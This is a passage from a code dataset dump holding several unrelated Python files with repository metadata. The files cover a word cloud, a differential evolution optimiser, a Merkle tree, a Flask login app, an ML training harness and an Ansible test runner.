max_words=1000, # 最大词数
mask=back_color, # 以该参数值作图绘制词云,这个参数不为空时,width和height会被忽略
max_font_size=70, # 显示字体的最大值
font_path="resources/STKAITI.TTF", # 解决显示乱码问题,可进入C:/Windows/Fonts/目录更换字体
random_state=42, # 为每个词返回一个PIL颜色
stopwords=stopwords,
# width=1000, # 图片的宽
# height=860 #图片的长
)
word_count = Counter(words_list)
# 删除字典里面的回车换行,避免Pillow的bug
# size, offset = self.font.getsize(text, direction, features)
# https://github.com/python-pillow/Pillow/issues/2614
del (word_count['\r\n'])
print(word_count)
# plt.imshow(back_color)
wc.generate_from_frequencies(word_count)
# # 基于彩色图像生成相应彩色
image_colors = ImageColorGenerator(back_color)
# plt.imshow(wc)
# 绘制结果
plt.axis('off')
plt.figure()
plt.imshow(wc.recolor(color_func=image_colors))
plt.axis('off')
plt.show()
wc.to_file('resources/word_cloud.jpg')
|
[
"[email protected]"
] | |
f8abe5ecf1cad5f4ae9a99be711931aa542fc6df
|
5774101105b47d78adb7a57eefdfa21502bbd70c
|
/python 之路/section5_反射_3/lib/manager.py
|
d31ae9adb3736efb7cdcb985aca4793d4a5f05a4
|
[] |
no_license
|
zhlthunder/python-study
|
34d928f0ebbdcd5543ae0f41baaea955c92f5c56
|
0f25dd5105ba46791842d66babbe4c3a64819ee5
|
refs/heads/master
| 2023-01-12T18:39:47.184978 | 2018-10-07T23:48:04 | 2018-10-07T23:48:04 | 90,516,611 | 0 | 1 | null | 2022-12-26T19:46:22 | 2017-05-07T07:39:48 |
HTML
|
UTF-8
|
Python
| false | false | 106 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:zhl
def order():
print("炫酷的订单页面")
|
[
"[email protected]"
] | |
f9acc6c1b378818ba70ee0481bb30fc5b6cb89e4
|
65d27e728627965168de68d80ad824a3731fb68e
|
/evolutionary.py
|
e930dcb532a2fe64b8cbd96254453c5b25952d63
|
[] |
no_license
|
Manolomon/differential-evolution
|
e2916c0f1e76d9e28186e12af20e2f4a181f605c
|
b40f21254db3d16406482e35b594b5cdc00c0445
|
refs/heads/master
| 2022-07-23T13:32:47.039345 | 2020-01-14T04:01:37 | 2020-01-14T04:01:37 | 233,727,687 | 0 | 0 | null | 2022-06-22T00:08:55 | 2020-01-14T01:11:22 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 2,175 |
py
|
import numpy
import random
import pandas as pd
def aptitud(individuo):
return (individuo[0]**2) + (individuo[1]**2)
def ed_rand_1_bin(np, max_gen, f, cr, execution):
EVOLUTION = pd.DataFrame()
g = 0 # Contador de generación
population = numpy.random.uniform(low=-5, high=5, size=(np,2)) # Crear una población inicial aleatoria
print(population)
print("---------------")
aptitudes = numpy.apply_along_axis(aptitud, 1, population) # Evaluar población
order = numpy.argsort(aptitudes)
population = population[order]
for g in range(max_gen):
for i in range (np):
# Mutación
no_parent = numpy.delete(population, i, 0)
row_i = numpy.random.choice(no_parent.shape[0], 3, replace=False) # Selección de donantes diferentes al padre r1 =/= r2 =/= r3
r = no_parent[row_i, :]
v_mutacion = ((r[0]-r[1]) * f) + r[2] # Vector Mutación v
# Recombinación
jrand = random.randint(0, 1) # Posición en la que padre e hijo diferirán
v_hijo = numpy.empty([1, 2])
for j in range(2):
t = random.uniform(0, 1)
if t < cr or j is jrand:
v_hijo[0,j] = v_mutacion[jrand]
else:
v_hijo[0,j] = population[i,j]
population = numpy.concatenate((population, v_hijo), axis=0)
# Remplazo por aptitud
aptitudes = numpy.apply_along_axis(aptitud, 1, population) # Evaluar población
order = numpy.argsort(aptitudes)
population = population[order]
# Se descartan los extras de la población
population = population[:np]
aptitudes = aptitudes[:np]
generation = pd.DataFrame({'x1': population[:, 0], 'x2': population[:, 1], 'f(x1,x2)': aptitudes})
generation['gen'] = g + 1
EVOLUTION = pd.concat([EVOLUTION, generation], ignore_index=True)
EVOLUTION.to_csv('./datasources/execution_' + str(execution + 1) + '.csv')
if __name__ == "__main__":
for i in range (30):
ed_rand_1_bin(np=50, max_gen=50, f=0.7, cr=0.0001, execution=i)
|
[
"[email protected]"
] | |
e63f17e2d553fe393a27ce15b7df51ab1d7c07be
|
783a23e160c26931dddce2415b0af1ecf71783af
|
/Crypto/unused/MerkleTree1.py
|
df4c9ded334e556aad14cb0e5a2f8a07cb9974fc
|
[] |
no_license
|
vaibspider/bitcoin
|
c89b108f60b8eedd4ca7bd4356f9d08f9ebd5140
|
f88c78cf52ecf0f588b2a90031a9d799d3a53f82
|
refs/heads/master
| 2022-12-08T17:13:15.310266 | 2020-08-14T16:45:42 | 2020-08-14T16:45:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,265 |
py
|
from Crypto.Hash import SHA256
from collections import OrderedDict
from typing import List
class MerkleTree:
def __init__(self, txnList: List[str]) -> List[str]:
self.listOfTxns: List[str] = txnList
self.mrkl_root: str = ""
def getHashValue(self,left: str, right: str) -> str:
newHash = SHA256.new()
newData: str = left+right
newHash.update(newData.encode('utf-8'))
return newHash.hexdigest()
def get_new_list(self, tempList: List[str]) -> List[str]:
newList: List[str] = []
index: int = 0
while(index<len(tempList)):
left:str = tempList[index]
index+=1
right:str = ""
if index!=len(tempList):
right = tempList[index]
newList.append(self.getHashValue(left,right))
index+=1
return newList
def merkle_tree(self):
tempList: List[str] = self.listOfTxns
newList: List[str] = self.get_new_list(tempList)
while(len(newList)!=1):
newList = self.get_new_list(newList)
self.mrkl_root = newList[0]
def getRoot(self) -> str:
return self.mrkl_root
temp = MerkleTree(['a','e','c','d'])
temp.merkle_tree()
print(temp.mrkl_root)
|
[
"[email protected]"
] | |
75cc7c8d1fba46bcee40c74f4deab8796d53a56b
|
5b37c4bd44553a0ae29d14cde773a73fd6f091ef
|
/day16.py
|
0b8a71970dd0b9bdd6a4e7b5dd0869ff6515f8c7
|
[] |
no_license
|
Curiouspaul1/30daysofcode-Dsc
|
bf38cacc76d537a4722d7a87be2d6d8657c1ffd9
|
56735671732b22645d6e0dd87884a141c6ddb90b
|
refs/heads/master
| 2022-04-26T00:52:56.590578 | 2020-04-24T12:27:42 | 2020-04-24T12:27:42 | 250,358,176 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,047 |
py
|
from flask import Flask, request, jsonify,make_response
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.exc import IntegrityError
from flask_bcrypt import Bcrypt
from day10 import emailcheck
import os
# Database directory
basedir = os.getcwd()
app = Flask(__name__)
#app config
"""
This config clause specifies the database location. And disabes an option to
track changes in database to False (it's turned on by default). Sqlite comes
by default with flask so no need to worry
about installing any rdbms
"""
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///" + os.path.join(basedir,"app.sqlite") or os.getenv("DATABASE_URI")
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
ma = Marshmallow(app)
bcrypt = Bcrypt(app)
# Database Model
class User(db.Model):
"""
The user class represents an sql table. It's schema is outlined
below, as with the aid of an ORM (Sqlalchemy) or more precisely
flask-sqlalchemy (a wrapper built around the more generic sqlalchemy).
This allows me to write native python objects that translate to (more or less)
SQL tables.
"""
id = db.Column(db.Integer,primary_key=True,nullable=False)
username = db.Column(db.String(50),unique=True)
email = db.Column(db.String(100),unique=True) ## The unique property on email, disallows duplicate emails
password = db.Column(db.String(100))
# Signup Handler
@app.route('/signup',methods=['POST'])
def signup():
# fetch data
user_data = request.get_json()
# hash password
password_hash = bcrypt.generate_password_hash(user_data["password"])
# validate email using email checker from day10 (regex)
if emailcheck(user_data["email"]):
# checks to see if email doesn't already exists
try:
new_user = User(password=password_hash,email=user_data["email"])
db.session.add(new_user)
except IntegrityError:
return make_response("User with email already exists",406)
# checks also to see if username doesnt already exist
try:
new_user.username = user_data["username"]
db.session.commit()
except IntegrityError:
return make_response("User with username already exists",406)
else:
return make_response("Invalid Email",406)
return make_response("registration successful",200)
# Login/Auth Handler
@app.route('/login',methods=['POST'])
def login():
login_data = request.get_json()
# find user with username or email
user = User.query.filter_by(username=login_data["username"]).first() or User.query.filter_by(email=login_data["email"])
if user:
# fetch passowrd from database then compare
password_hash = user.password
if bcrypt.check_password_hash(password_hash,login_data["password"]):
return make_response("Signed in successfully", 200)
else:
return make_response("Wrong password",401)
else:
return make_response("No such user found",404)
|
[
"[email protected]"
] | |
86d71e2a0078a23f5ba88d4cf5f4ca0b1a07ee59
|
b7f78e4758374cffcc912489e40134dee4a70d26
|
/domain/providers/provider.py
|
fffe3086f34e3fe53674d3d454e0cb13f1afa008
|
[] |
no_license
|
Canu667/python-payment-gateway
|
b0fa57d15f6985975b934d6e6f3d22ac14d42166
|
d680c618ec269e1f6fdbdd4d18768b16d54ae118
|
refs/heads/master
| 2021-07-11T15:00:07.266354 | 2020-01-19T22:03:40 | 2020-01-19T22:03:40 | 228,256,666 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 959 |
py
|
from abc import ABC, abstractmethod
from models.payment_model import PaymentModel
from schemas.payment import PaymentDto
class Provider(ABC):
@abstractmethod
def create_payment(self, payment: PaymentDto):
pass
def capture(self, payment: PaymentModel):
pass
class CouldNotInitialisePayment(Exception):
def __init__(self, order_id, message):
super(CouldNotInitialisePayment, self).__init__(
"Payment {} could not be initalised: {} ".format(order_id, message))
class CouldNotCaptureOnPayment(Exception):
def __init__(self, order_id, message):
super(CouldNotCaptureOnPayment, self).__init__(
"Payment {} could not be captured: {} ".format(order_id, message))
class CouldNotActivatePayment(Exception):
def __init__(self, order_id, message):
super(CouldNotActivatePayment, self).__init__(
"Payment {} could not be activated: {} ".format(order_id, message))
|
[
"[email protected]"
] | |
87351cd3e0205ea5223f15e570548bc590e8013f
|
5ed35806523dd5587cb2dc31e55aa086dda87801
|
/datamanagement/modules/pipeline/CreateCASAImagerParsetFiles.py
|
9a9101586cfb2b6a327b4d4716debf24d9aad5d7
|
[] |
no_license
|
oscarmartinezrubi/ledama
|
97d3e188432e42f37dd0229080a8e0750acbf128
|
75fca624dfd38e58af32f23a96113b04248cc251
|
refs/heads/master
| 2020-12-31T04:16:59.640490 | 2016-09-16T12:04:12 | 2016-09-16T12:04:12 | 68,370,784 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,501 |
py
|
################################################################################
# Created by Oscar Martinez #
# [email protected] #
################################################################################
import os
from ledama import utils
from ledama import msoperations
from ledama import tasksdistributor as td
from ledama.ReferenceFile import ReferenceFile
from ledama.LModule import LModule
from ledama.LModuleOptions import LModuleOptions
EXTENSION = '.imaging.parset'
class CreateCASAImagerParsetFiles(LModule):
def __init__(self,userName = None):
# Define the options
options = LModuleOptions()
options.add('reffile', 'i', 'Input RefFile')
options.add('parset', 't', 'Input template CASAImager parset file')
options.add('oparset', 'o', 'Output CASAImager parset files folder')
options.add('oextension', 'e', 'Output files extension',helpmessage='. The produced files will be stored in a folder defined in LaunchCASAImager, but in this point you can define the common file name. The produced files have a file name as [MS name].[oextension].*', default='.img.ver0')
options.add('numprocessors', 'p', 'Simultaneous processes per node', default = 1)
options.add('numnodes', 'n', 'Simultaneous nodes', default = 64)
# the information
information = 'Create CASAImager parset files'
# Initialize the parent class
LModule.__init__(self, options, information)
# Make the parset file for the measurement set indicated in what
def function(self, identifier, what, childIndex, grandChildIndex, taskIndex):
(inputms,node,imagename,outputParsetFilePath) = what
ofile = open(outputParsetFilePath, "w")
for line in self.inParsetFileLines:
if line.count('vis'):
ofile.write('vis="/net/' + node + inputms + '"\n')
elif line.count('imagename'):
ofile.write('imagename="' + imagename + '"\n')
else:
ofile.write(line + '\n')
ofile.close()
return (inputms, outputParsetFilePath)
# Get the VDS file name (it is the MS name + .vds)
def getCASAImagerParsetFileName(self, absPath):
return msoperations.getMeasurementSetName(absPath) + EXTENSION
def process(self, reffile, parset, oparset, oextension, numprocessors, numnodes):
# Check if file exists
if not os.path.isfile(parset):
print 'Error: ' + parset + ' does not exists'
return
self.inParsetFileLines = (open(parset, "r")).read().split('\n')
parsetsOutPath = utils.formatPath(oparset)
os.system('mkdir -p ' + parsetsOutPath )
referenceFile = ReferenceFile(reffile)
whats = []
for i in range(len(referenceFile.absPaths)):
absPath = referenceFile.absPaths[i]
whats.append((absPath, referenceFile.nodes[i], msoperations.getMeasurementSetName(absPath) + oextension, parsetsOutPath + '/' + self.getCASAImagerParsetFileName(absPath)))
# Run it
(retValuesOk, retValuesKo) = td.distribute(referenceFile.nodes, whats, self.function, numprocessors, numnodes)
td.showKoFirst(retValuesKo)
if len(retValuesOk):
print str(len(retValuesOk)) + ' CASA imager parset files were created. Check ' + parsetsOutPath
|
[
"[email protected]"
] | |
f9f6066f5029d0b9a9d17b03d3525476857e4fb2
|
2d5d17225ddabe81f17b74589895f49e530344f8
|
/testchild.py
|
bd5664d3017ce696e7674d7c93dc078eddbccbca
|
[] |
no_license
|
Gracia958/testrepo
|
230644e4976414c67e12a508d14f832e3d73d7d9
|
db898e9748ab851b65421ae7819019cd5211b64b
|
refs/heads/master
| 2022-11-27T13:10:05.071494 | 2020-07-28T07:19:54 | 2020-07-28T07:19:54 | 282,127,528 | 0 | 0 | null | 2020-07-28T07:19:55 | 2020-07-24T05:03:38 |
Python
|
UTF-8
|
Python
| false | false | 64 |
py
|
##Add a new file in child branch.
print ("Inside Child branch")
|
[
"[email protected]"
] | |
a083a7f709dddbd60e57d7f87fa6d2c921a93153
|
b0c391ecf351e2317ac61c257dd6bfa5b10d4015
|
/pymotifs/motifs/info.py
|
8e50f9402510548d536cf1cc88526c18a5f68479
|
[] |
no_license
|
BGSU-RNA/RNA-3D-Hub-core
|
57db94bfff9b338b3a751f545699f4117150b921
|
1982e10a56885e56d79aac69365b9ff78c0e3d92
|
refs/heads/master
| 2023-05-26T09:41:38.397152 | 2023-05-23T05:50:10 | 2023-05-23T05:50:10 | 6,049,336 | 3 | 1 | null | 2022-06-21T21:27:52 | 2012-10-02T18:26:11 |
Python
|
UTF-8
|
Python
| false | false | 1,058 |
py
|
"""Load the motif info data.
This will load the cached data to store all motifs into the DB.
"""
from pymotifs import core
from pymotifs import models as mod
from pymotifs.motifs.utils import BaseLoader
from pymotifs.motifs.release import Loader as ReleaseLoader
class Loader(BaseLoader):
dependencies = set([ReleaseLoader])
@property
def table(self):
return mod.MlMotifsInfo
def motifs(self, cached):
data = []
for entry in cached['motifs']:
data.append(self.table(
motif_id=entry['motif_id'],
ml_release_id=cached['release'],
type=cached['loop_type'],
handle=entry['name']['handle'],
version=entry['name']['version'],
comment=entry['comment'],
))
return data
def data(self, pair, **kwargs):
loop_type, release = pair
cached = self.cached(loop_type)
if not cached:
raise core.InvalidState("No cached data")
return self.motifs(cached)
|
[
"[email protected]"
] | |
82136ba6add582586d0f7de5f1aebe36c5ef8f5c
|
2e2c9cf0bf1f6218f82e7ecddbec17da49756114
|
/day1python基础/__init__.py
|
b29e98abae8a3e380d7654fbeaf3546ede374470
|
[] |
no_license
|
guoyunfei0603/py31
|
c3cc946cd9efddb58dad0b51b72402a77e9d7592
|
734a049ecd84bfddc607ef852366eb5b7d16c6cb
|
refs/heads/master
| 2023-03-02T20:50:02.052878 | 2021-02-05T06:17:24 | 2021-02-05T06:17:24 | 279,454,793 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 566 |
py
|
# -*- coding: utf-8 -*-
# @Time : 2020/6/24 10:18
# @Author : guoyunfei.0603
# @File : __init__.py.py
# s = "'abcd'"
# print(s[0:2]) #'a
# 三、 将字符串中的单词位置反转,“hello xiao mi” 转换为 “mi xiao hello”
# (提示:通过字符串分割,拼接,列表反序等知识点来实现)
s = "hello xiao mi"
s1 = s.split(' ')
t = s1[::-1] # 方式一
# print(t,type(t)) 是一个列表 ,最后还要拼接成字符串!!
new_str = ' '.join(t)
print(new_str,type(new_str))
# s1.reverse() # 方式二
# print(s1)
|
[
"[email protected]"
] | |
721bd1b05d530a4f48442cf012415980f573f230
|
4f3f2ae204a2c709bffde8e3ae478339f743c3e8
|
/main/migrations/0009_whitepaper_is_active.py
|
fd2ac8af2732a9a6b8528cadbb7d9911a2479ea1
|
[] |
no_license
|
Anupam124jain/ICO
|
a9d5f02d2cd1680c5a4545439238f7325c601373
|
5faf27c7e25bfc3d4fa7cfc3f8dff10583dddaad
|
refs/heads/master
| 2022-12-15T17:37:11.193927 | 2019-01-21T13:39:24 | 2019-01-21T13:39:24 | 166,819,535 | 0 | 0 | null | 2022-12-08T03:00:50 | 2019-01-21T13:33:33 |
Python
|
UTF-8
|
Python
| false | false | 389 |
py
|
# Generated by Django 2.1 on 2018-09-11 12:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0008_auto_20180911_1249'),
]
operations = [
migrations.AddField(
model_name='whitepaper',
name='is_active',
field=models.BooleanField(default=False),
),
]
|
[
"[email protected]"
] | |
0ed37eb51587abc34d6099dead9aa947fcb30c01
|
d20d4de2ee73a13aac79c5baeb8fc90ce3f4d02e
|
/chapter04/section10.py
|
3e85fdb8d91b8dc9693bf9ff5612a81cd3150454
|
[] |
no_license
|
wistra4/minpy
|
86e7c6b009b4ba35af12f6eeb2422ade9141d585
|
4cfe8eb669a55487a8f9bab6abe864ed2ea663ac
|
refs/heads/master
| 2023-03-13T01:29:07.644879 | 2021-03-03T08:52:20 | 2021-03-03T08:52:20 | 343,477,647 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,549 |
py
|
# 10_Pythonの文字列と日本語
# バイト(bytes)型
s = "あいうえお" # ひらがなを含む文字列型を定義
len(s) # 長さを調べる
bs = s.encode("shift-jis") # 文字列型からバイト型に変換
len(bs) # 長さを調べる
print(bs) # バイト型をprint()する
print(s[0])
print(bs[0])
# 文字列をバイト型に変換する
u = s.encode("euc-jp", "strict") # EUC-JPの文字列に変換
# バイト型を文字列型に変換する
u = s.decode("shift-jis", "ignore") # シフトJIS相当のバイト型を文字列型に変換
# スクリプトファイルのエンコード指定
# coding: エンコード名
# coding=エンコード名
# -*- coding: エンコード名 -*-
# coding: utf-8
# エンコードの判定
print("<エンコードの判定>")
def guess_encoding(s):
"""
バイト型の文字列を引数として受け取り、
エンコードを安易に判定する
"""
# 判定を行うエンコードをリストに保存
encodings = ["ascii", "utf-8", "shift-jis", "euc-jp"]
for enc in encodings:
try:
s.decode(enc) # エンコード変換を試みる
except UnicodeDecodeError:
continue # エンコード変換に失敗したので次を試す
else:
return enc
# エラーが発生しなかったら変換に成功したエンコードを返す
else:
return "" # 成功したエンコードがなければから文字列を返す
|
[
"[email protected]"
] | |
ab688480455f8430e70d31f40d5a7677b8fdd149
|
0008d0eaff317af3ccedf523299ae382a98a6e81
|
/experiments/Q3-pres/single-instance-learning/ST-primary_multiclass/temporal_downsample/no_augmentation/_sources/train_emmental_1e13924c460154448026d09dac861e0a.py
|
df5d0b3b5326469959c12aad8210cd7007b56851
|
[] |
no_license
|
geoffreyangus/cow-tus
|
44227d8c449a262af2b9b1c644fc41b72f511e29
|
ad0eec4a5691b43a1708a4d9f599a6d7725092dd
|
refs/heads/master
| 2020-08-04T14:35:32.531057 | 2020-06-12T19:05:36 | 2020-06-12T19:05:36 | 212,168,342 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 10,514 |
py
|
import os
import os.path as path
import logging
from functools import partial
import emmental
from emmental import Meta
from emmental.data import EmmentalDataLoader
from emmental.learner import EmmentalLearner
from emmental.model import EmmentalModel
from emmental.scorer import Scorer
from emmental.task import EmmentalTask
import torch
import torch.nn as nn
import torch.utils.data as torch_data
from torchvision import transforms
from sacred import Experiment
from sacred.observers import FileStorageObserver
from sacred.utils import apply_backspaces_and_linefeeds
from cow_tus.data.transforms import training_ingredient as transforms_ingredient
from cow_tus.data.dataloaders import get_sample_weights
from cow_tus.util.util import unpickle, ce_loss, output
from cow_tus.models.modules import zoo as modules
import cow_tus.data.datasets as all_datasets
EXPERIMENT_NAME = 'trainer'
ex = Experiment(EXPERIMENT_NAME, ingredients=[transforms_ingredient])
ex.logger = logging.getLogger(__name__)
ex.captured_out_filter = apply_backspaces_and_linefeeds
@ex.config
def config(transforms):
"""
Configuration for training harness.
"""
task_str = None
assert task_str, f'task {task_str} must have a value'
tasks = task_str.split('&')
for task in tasks:
if task not in {'primary', 'primary_multiclass', '2normal_binary'}:
raise ValueError(f'task {task} not recognized')
# tuner parameters
instance_level = True
representative_loop_sampling = False
temporal_downsample = False
spatial_downsample = False
data_augmentation = False
if instance_level:
assert not representative_loop_sampling, \
'instance_level and representative_loop_sampling are mutually exclusive'
assert not (temporal_downsample and spatial_downsample), \
'temporal_downsample and spatial_downsample are mutually exclusive'
hypothesis_conditions = ['Q3-pres']
# whether or not we are working at an exam level or loop level
if instance_level:
hypothesis_conditions.append('instance-level-learning')
else:
hypothesis_conditions.append('single-instance-learning')
# labeling schema we are using
if len(tasks) > 1:
hypothesis_conditions.append('MT-' + '&'.join(tasks))
else:
hypothesis_conditions.append('ST-' + tasks[0])
# downsampling procedure
if temporal_downsample:
hypothesis_conditions.append('temporal_downsample')
elif spatial_downsample:
hypothesis_conditions.append('spatial_downsample')
else:
hypothesis_conditions.append('full_size')
# whether or not we are using data augmentation
if data_augmentation:
hypothesis_conditions.append('data_augmentation')
else:
hypothesis_conditions.append('no_augmentation')
exp_dir = path.join('experiments', *hypothesis_conditions)
meta_config = {
'device': 0
}
logging_config = {
'evaluation_freq': 1,
'checkpointing': True,
'checkpointer_config': {
'checkpoint_runway': 10,
'checkpoint_metric': {
"primary/cow-tus-dataset/valid/accuracy": "max"
}
}
}
metrics = {}
for task in tasks:
if task in {'primary', '2normal_binary'}:
metrics[task] = ['accuracy', 'roc_auc' , 'precision', 'recall', 'f1']
elif task in {'primary_multiclass'}:
metrics[task] = ['accuracy']
dataset_class = 'InstanceDataset' if instance_level else 'GlobalDataset'
dataset_args = {
'dataset_dir': 'data/split/by-animal-number/hold-out-validation',
'labels_path': f"data/labels/{'instances' if instance_level else 'globals'}.csv"
}
if temporal_downsample: # resize 224x224, normalize, extract_instance, random_offset
tmp = transforms['preprocess_fns']
if representative_loop_sampling:
tmp = tmp + [transforms['rls_transform_fn']]
preprocess_transforms = tmp + [transforms['temporal_downsample_transform_fn']]
elif spatial_downsample: # resize 120x80, normalize, extract_instance
tmp = [transforms['spatial_downsample_transform_fn']] + transforms['preprocess_fns'][1:]
if representative_loop_sampling:
tmp = tmp + [transforms['rls_transform_fn']]
preprocess_transforms = tmp
else: # resize 224x224, normalize
preprocess_transforms = transforms['preprocess_fns']
transform_fns = {
'train': preprocess_transforms,
'valid': preprocess_transforms,
'test': preprocess_transforms
}
if data_augmentation:
transform_fns['train'] = transform_fns['train'] + transforms['augmentation_fns']
dataloader_configs = {
'train': {
'batch_size': 1,
'num_workers': 8,
'shuffle': False
},
'valid': {
'batch_size': 1,
'num_workers': 8,
'shuffle': True
}
}
sampler_configs = {
'train': {
'class_name': 'RandomSampler',
'args': {
'num_samples': 150,
'replacement': True,
}
}
}
task_to_label_dict = {task: task for task in tasks}
task_to_cardinality = {
'primary': 2,
'primary_multiclass': 4,
'2normal_binary': 2
}
encoder_class = 'I3DEncoder'
encoder_args = {
'modality': 'gray',
'weights_path': 'i3d/model_flow.pth'
}
decoder_class = "AttDecoder"
decoder_args = {
'dropout_p': 0.0
}
learner_config = {
'n_epochs': 30,
'valid_split': 'valid',
'optimizer_config': {'optimizer': 'adam', 'lr': 0.01, 'l2': 0.000},
'lr_scheduler_config': {
'warmup_steps': None,
'warmup_unit': 'batch',
'lr_scheduler': 'step',
'step_config': {
'step_size': 6,
'gamma': 0.5
}
},
}
class TrainingHarness(object):
def __init__(self):
"""
"""
self._init_meta()
self.datasets = self._init_datasets()
self.dataloaders = self._init_dataloaders()
self.model = self._init_model()
@ex.capture
def _init_meta(self, _seed, exp_dir, meta_config, learner_config, logging_config):
emmental.init(path.join(exp_dir, '_emmental_logs'))
Meta.update_config(
config={
'meta_config': {**meta_config, 'seed': _seed},
'model_config': {'device': meta_config['device']},
'learner_config': learner_config,
'logging_config': logging_config
}
)
@ex.capture
def _init_datasets(self, _log, dataset_class, dataset_args, transform_fns):
datasets = {}
for split in ['train', 'valid']:
datasets[split] = getattr(all_datasets, dataset_class)(
split_str=split,
transform_fns=transform_fns[split],
**dataset_args
)
_log.info(f'Loaded {split} split.')
return datasets
@ex.capture
def _init_dataloaders(self, _log, dataloader_configs, sampler_configs, task_to_label_dict):
dataloaders = []
for split in ['train', 'valid']:
dataloader_config = dataloader_configs[split]
if split == 'train':
sampler_class = sampler_configs[split]['class_name']
sampler_args = sampler_configs[split]['args']
if sampler_class == 'WeightedRandomSampler':
weights = get_sample_weights(self.datasets[split], sampler_args['weight_task'], sampler_args['class_probs'])
sampler = getattr(torch_data, sampler_class)(
weights=weights, num_samples=sampler_args['num_samples'], replacement=sampler_args['replacement'])
else:
sampler = getattr(torch_data, sampler_class)(
data_source=self.datasets[split], **sampler_args)
dataloader_config = {
'sampler': sampler,
**dataloader_config
}
dl = EmmentalDataLoader(
task_to_label_dict=task_to_label_dict,
dataset=self.datasets[split],
split=split,
**dataloader_config,
)
dataloaders.append(dl)
_log.info(f'Built dataloader for {split} set.')
return dataloaders
@ex.capture
def _init_model(self, encoder_class, encoder_args, decoder_class, decoder_args, task_to_label_dict, metrics):
encoder_module = getattr(modules, encoder_class)(**encoder_args)
tasks = [
EmmentalTask(
name=task_name,
module_pool=nn.ModuleDict(
{
f'encoder_module': encoder_module,
f'decoder_module_{task_name}': getattr(modules, decoder_class)(task_to_cardinality[task_name], **decoder_args),
}
),
task_flow=[
{
'name': 'encoder_module', 'module': 'encoder_module', 'inputs': [('_input_', 'exam')]
},
{
'name': f'decoder_module_{task_name}',
'module': f'decoder_module_{task_name}',
'inputs': [('encoder_module', 0)],
},
],
loss_func=partial(ce_loss, task_name),
output_func=partial(output, task_name),
scorer=Scorer(metrics=metrics[task_name]),
)
for task_name in task_to_label_dict.keys()
]
model = EmmentalModel(name='cow-tus-model', tasks=tasks)
return model
def run(self):
learner = EmmentalLearner()
learner.learn(self.model, self.dataloaders)
@ex.config_hook
def hook(config, command_name, logger):
if config['exp_dir'] == None:
raise Exception(f'exp_dir is {config["exp_dir"]}')
ex.observers.append(FileStorageObserver(config['exp_dir']))
@ex.main
def main():
trainer = TrainingHarness()
res = trainer.run()
return res
if __name__ == '__main__':
ex.run_commandline()
|
[
"[email protected]"
] | |
ba2bb89073ea49c7a089f39e13f410021fb648ce
|
f94651173636a51180e68adaebe05e4b20d60fdd
|
/utils/ansible2/test_runner.py
|
8496fd596f332708fc01f81a932ae3a048d37a11
|
[] |
no_license
|
wangtangkun/devops
|
5082a0e04fcd6796b2b9474da528c9643b16d0b0
|
979db139a4841b3dc1fafa17ad805b04ef69c8f3
|
refs/heads/master
| 2020-09-12T18:27:19.024758 | 2019-11-18T18:02:55 | 2019-11-18T18:02:55 | 222,510,592 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,506 |
py
|
# coding: utf-8
from utils.ansible2.runner import AdHocRunner, CommandRunner, PlayBookRunner
from utils.ansible2.inventory import Inventory
def TestAdHocRunner():
"""
以yml的形式 执行多个命令
:return:
"""
host_data = [
{
"hostname": "192.168.179.135",
"ip": "192.168.179.135",
"port": 22
},
] #主机列表
inventory = Inventory(host_data) #动态生成主机配置信息
runner = AdHocRunner(inventory)
# dest = "/opt/mysql/world.sh"
tasks = [
# {"action": {"module": "ping"}, "name": "run_whoami"},
{"action": {"module": "replace", "args": 'path=/tmp/a.txt regexp="^(ac.*)" replace="#\\1"'},
"name": "down nginx"}
# {"action": {"module": "shell", "args": "free -m | awk 'NR\=\=2{printf \"%.2f\", $3*100/$2 }'"}, "name": "get_mem_usage"},
# {"action": {"module": "shell", "args": "df -h | awk '$NF\=\=\"/\"{printf \"%s\", $5}'"}, "name": "get_disk_usage"},
# {"action": {"module": "copy", "args": "src=/home/python/Desktop/3358.cnf dest=/opt/mysql/my3358.cnf mode=0777"}, "name": "send_file"},
# {"action": {"module": "copy", "args": "src=/home/python/Desktop/deploy.sh dest=/opt/mysql/deploy.sh mode=0777"}, "name": "send_file"},
# {"action": {"module": "command", "args": "sh /opt/mysql/hello.sh"}, "name": "execute_file"},
# {"action": {"module": "shell", "args": "sudo sh /opt/mysql/deploy.sh"}, "name": "execute_file"},
# {"action": {"module": "lineinfile", "args": "dest=/opt/mysql/hello.sh line=hello1 regexp=echo state=present"}, "name": "modify_file"},
# {"action": {"module": "lineinfile", "args": "dest=/opt/mysql/world.sh line="" regexp=echo state=present"}, "name": "modify_file"},
# {"action": {"module": "lineinfile", "args": "dest=%s line=sun regexp=echo state=present" % dest}, "name": "modify_file"},
# {"action": {"module": "shell", "args": "lineinfile dest=/opt/mysql/hello.sh regexp=hello insertafter=#echo line=hello world"}, "name": "modify_file"},
# {"action": {"module": "shell", "args": "grep 'cpu ' /proc/stat | awk '{usage\=($2+$4)*100/($2+$4+$5)} END {print usage}'"}, "name": "get_cpu_usage"},
]
ret = runner.run(tasks)
print(ret.results_summary)
print(ret.results_raw)
def TestCommandRunner():
"""
执行单个命令,返回结果
:return:
"""
host_data = [
{
"hostname": "192.168.179.135", #key值
"ip": "192.168.179.135",
# "port": 22,
# "username": "root",
},
]
inventory = Inventory(host_data) #重新组成虚拟组
runner = CommandRunner(inventory)
res = runner.execute('pwd')
# print(res.results_command)
print(res.results_raw,type(res.results_raw))
# res.results_raw
def TestPlayBookRunner():
"""
执行playbook
:return:
"""
host_data = [
{
"hostname": "10.211.55.19",
"ip": "10.211.55.19",
"port": 22,
"username": "root",
},
]
inventory = Inventory(host_data)
runner = PlayBookRunner(inventory).run("/Users/derekwang/test")
print(runner)
if __name__ == "__main__":
